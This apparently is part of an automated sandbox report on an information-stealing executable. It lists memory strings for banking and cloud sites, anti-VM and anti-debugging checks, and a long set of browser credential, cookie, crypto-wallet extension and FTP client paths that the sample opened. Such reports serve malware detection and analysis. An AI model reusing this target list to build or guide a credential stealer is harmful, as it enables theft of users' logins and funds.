Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VBoxService.exe
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000002.1709148906.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh?
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ~VirtualMachineTypes
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ]DLL_Loader_VirtualMachine
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VMWare
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: biyhoksefdad.exe, 00000000.00000003.1449937498.0000000003D93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\biyhoksefdad.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Queries volume information: C:\ VolumeInformation
Source: biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578283765.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627470793.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578283765.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578391349.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627650605.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\biyhoksefdad.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.biyhoksefdad.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: biyhoksefdad.exeString found in binary or memory: llets/Electrum-LTC
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/ElectronCash
              Source: biyhoksefdad.exeString found in binary or memory: window-state.json
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/JAXX New Version
              Source: biyhoksefdad.exe, 00000000.00000003.1541835345.0000000000FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: biyhoksefdad.exeString found in binary or memory: ExodusWeb3
              Source: biyhoksefdad.exeString found in binary or memory: Wallets/Ethereum
              Source: biyhoksefdad.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: biyhoksefdad.exeString found in binary or memory: keystore
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\biyhoksefdad.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: number of queries: 1001
Source: Yara match | File source: 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR
